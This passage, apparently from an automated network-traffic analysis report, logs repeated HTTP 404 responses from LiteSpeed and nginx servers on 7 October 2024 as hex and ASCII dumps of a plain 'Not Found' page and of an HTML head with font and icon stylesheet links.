6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:40 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:42 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:42 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:42 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:45 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:48 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:57:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 